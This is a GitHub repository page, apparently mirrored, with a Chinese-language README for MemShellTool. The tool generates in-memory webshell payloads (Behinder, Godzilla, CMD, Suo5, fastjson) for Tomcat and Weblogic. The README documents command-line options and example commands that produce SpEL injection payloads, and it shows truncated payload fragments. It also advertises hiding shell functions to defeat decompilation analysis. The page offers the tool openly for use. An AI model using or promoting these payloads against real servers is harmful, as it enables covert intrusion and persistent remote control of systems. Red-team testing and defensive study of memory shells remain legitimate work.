https://github.com/yaoyao-cool/MemShellTool
内存马生成工具 Tomcat、Weblogic、CMD、Behinder、Godzilla、Suo5......
https://github.com/yaoyao-cool/MemShellTool
java-memory-shell memory-shell webshell
Last synced: 5 days ago
JSON representation
内存马生成工具 Tomcat、Weblogic、CMD、Behinder、Godzilla、Suo5......
- Host: GitHub
- URL: https://github.com/yaoyao-cool/MemShellTool
- Owner: yaoyao-cool
- Created: 2024-07-21T12:27:08.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-10-27T07:00:01.000Z (about 1 year ago)
- Last Synced: 2024-10-27T07:51:27.826Z (about 1 year ago)
- Topics: java-memory-shell, memory-shell, webshell
- Homepage:
- Size: 648 KB
- Stars: 18
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - yaoyao-cool/MemShellTool - 内存马生成工具 Tomcat、Weblogic、CMD、Behinder、Godzilla、Suo5...... (Others)
README
# MemShellTool
内存马payload生成工具
# 0x00
- 一键生成内存马payload
- 支持多种类型webshell、代理工具
- 多种编码方式
- 支持生成agent马
- 应对特殊环境下的payload长度限制,支持通过加载器分离加载
- 隐藏内存马class中的函数,对抗人工反编译分析
- 添加gui和反编译功能,可反编译显示注入器和webshell类
- 完善中......
# 0x01
gui:
```
java -jar MemShellTool.jar -gui
```
命令行:
```
usage: java -jar MemShellTool.jar [-ct ] [-d] [-h] [-hn ] [-icn
] [-it ] [-k ] [-op ] [-ot ] [-p ]
[-slt ] [-sname ] [-st ] [-u ]
-ct,--containerType ContainerType: Tomcat,Weblogic...
-d,--default default option
-h,--help print this message
-hn,--headerName access shell with header
-icn,--injectClassName loader name
-it,--injectType injectType: Single,Loader,ShellCode
-k,--key shell key: GodZilla...need
-op,--outPath output path
-ot,--outTpye output type
-p,--password shell password
-slt,--shellType ServerType: CMD,Behinder...
-sname,--shellClassName shellClassName: xxxFilter
-st,--serverType ServerType: Filter,Valve,Servlet...
-u,--shellPath shell url: /shell
-------------------------
Available [InjectType]:
[SINGLE, LOADER, SHELLCODE]
-------------------------
Available [Container]:
[WEBLOGIC, TOMCAT]
-------------------------
Container [WEBLOGIC] Available ServerType:
[FILTER]
Container [TOMCAT] Available ServerType:
[FILTER, FILTER, SERVLET, VALVE, WEBSOCKET]
-------------------------
Server Type [FILTER] Available ShellType:
[BEHINDER, CMD, SUO5, GODZILLA]
Server Type [FILTER] Available ShellType:
[BEHINDER, CMD, SUO5, GODZILLA]
Server Type [SERVLET] Available ShellType:
[BEHINDER, CMD, GODZILLA]
Server Type [VALVE] Available ShellType:
[BEHINDER, CMD, GODZILLA]
Server Type [WEBSOCKET] Available ShellType:
[CMD]
-------------------------
Available OutTpye:
[RAW, BASE64, BCEL, JAVASCRIPT, SPEL, EL]
```
example:
spel表达式 tomcat filter 哥斯拉内存马
```
java -jar MemShellTool-v1.0.jar -d -ct TOMCAT -sname Helper -st FILTER -u /404 -slt BEHINDER -ot SPEL
spel with JsEngine:
T(javax.script.ScriptEngineManager).newInstance().getEngineByName("js").eval('var co......
spel with Spring defineClass:
T(org.springframework.cglib.core.ReflectUtils).defineClass("inje......
key value
------- -------
InjectType SINGLE
ServerType FILTER
ContainerType TOMCAT
ShellType BEHINDER
ShellClassName Helper
ShellPath /404
Password 1a1dc91c907325c6
Key key
HeaderName Accept-Header
InjectClassName inject_dc58ad
OutPath ./
OutTpye SPEL
```
SPEL 注入 tomcat websocket内存马
```
java -jar MemShellTool-v1.0.jar -d -ct TOMCAT -sname Helper -st WEBSOCKET -u /ws -slt CMD -ot SPEL
```
注入shell
连接shell
# 0x2
新增fastjson内存马,基于fastjson组件实现内存马功能。
目前支持cmdshell和冰蝎4.0
实现原理参考:https://oh3r.vip/2025/02/05/fastjson%E5%86%85%E5%AD%98%E9%A9%AC/
# 0x3
反编译显示注入器和webshell类
